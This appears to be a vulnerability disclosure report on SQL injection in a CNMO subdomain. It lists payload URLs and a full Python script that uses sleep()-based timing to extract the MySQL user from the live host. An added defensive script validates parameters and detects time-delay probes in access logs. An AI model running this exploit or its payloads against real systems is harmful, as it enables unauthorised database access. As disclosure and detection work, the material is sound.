
Blind SQL injection on a 手机中国 (CNMO) site


(1) Time-based blind injection

http://dp.cnmo.com/hit_for_dp.php?pro_id=if(1,sleep(3),0)

(2) Two error-based injection points

http://dp.cnmo.com/rank_list.php?curstamp=1439074288&page=&status=1&type=1

http://dp.cnmo.com/single_rank.php?page=&type=9


Proof of vulnerability:

Guessing user() character by character:

Code area:
[email protected] 

root privileges, internal network address.


Script used:

Code area:

```python
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import hashlib
import urllib

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
}

# candidate characters for user(): a-z, 0-9, '@', '_' and '.'
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.']

print '[%s] Start to retrive MySQL user' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 12):
    found = False
    while found == False:
        for payload in payloads:
            timeout_count = 0
            for j in range(1, 3):  # 2 times to confirm
                try:
                    # a correct guess makes the server sleep(6), which exceeds the 3s timeout
                    conn = httplib.HTTPConnection('dp.cnmo.com', timeout=3)
                    conn.request(method='GET',
                                 url="/hit_for_dp.php?pro_id=if(ascii(mid(user(),%s,1))=%s,sleep(6),0)" % (i, ord(payload)),
                                 headers=headers)
                    conn.getresponse().read()
                    conn.close()
                    print '.',
                    break
                except Exception, e:
                    timeout_count += 1
                    time.sleep(0.01)
            # two timeouts in a row: the character is confirmed
            if timeout_count == 2:
                user += payload
                print '\n[In progress] now user is %s' % user
                found = True
                break

print '\nFinally, MySQL user is:', user
```

Also ran it through sqlmap; multiple databases are reachable:


Fix:

Filter or escape the input.
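As an added example (not part of the original report or the site's code), the following Python script shows the defender's side of both points above: the "filter" half of the fix as a strict integer whitelist for the parameters these endpoints take, and a scan of web-server access-log lines for the time-delay functions a time-based blind probe depends on. The log lines, the IP addresses and the response-time field are constructed for the example; the parameter names come from the URLs in the report.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original report). Lines 1-2
# carry the time-based probe shape shown above; line 3 is a benign request.
SAMPLE_LOG = """\
1.2.3.4 - - [09/Aug/2015:10:11:12 +0800] "GET /hit_for_dp.php?pro_id=if(1,sleep(3),0) HTTP/1.1" 200 12 3.004
1.2.3.4 - - [09/Aug/2015:10:11:20 +0800] "GET /hit_for_dp.php?pro_id=if(ascii(mid(user()%2C1%2C1))%3D114%2Csleep(6)%2C0) HTTP/1.1" 200 12 6.010
5.6.7.8 - - [09/Aug/2015:10:12:00 +0800] "GET /hit_for_dp.php?pro_id=12345 HTTP/1.1" 200 12 0.012
9.9.9.9 - - [09/Aug/2015:10:12:30 +0800] "GET /rank_list.php?curstamp=1439074288&page=&status=1&type=1%27 HTTP/1.1" 200 12 0.015
"""

# Parameters the affected endpoints take as integers (names taken from the URLs above).
INT_PARAMS = {"pro_id", "page", "type", "status", "curstamp"}
INT_RE = re.compile(r"^[0-9]{0,10}$")          # page= is legitimately empty in the URLs
# Time-delay primitives that a time-based blind probe depends on.
DELAY_RE = re.compile(r"(?i)\b(sleep|benchmark)\s*\(|waitfor\s+delay")
# Assumed log layout: combined-style prefix plus a trailing response time in seconds.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" \d+ \d+ (?P<rt>[\d.]+)$')

def is_valid_int_param(value):
    """The 'filter' half of the fix: accept only what an integer id can look like."""
    return INT_RE.match(value) is not None

def scan_line(line):
    """Return a finding for one log line, or None when every parameter passes."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    bad = {}
    # parse_qsl percent-decodes values, so %2C / %3D become the literal , and =
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if DELAY_RE.search(value):
            bad[name] = "time-delay function"
        elif name in INT_PARAMS and not is_valid_int_param(value):
            bad[name] = "non-integer value"
    if not bad:
        return None
    # A delay payload that also produced a slow response is the strongest signal.
    return {"ip": m.group("ip"), "path": url.path, "params": bad,
            "slow": float(m.group("rt")) >= 3.0}

def scan_log(text):
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```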

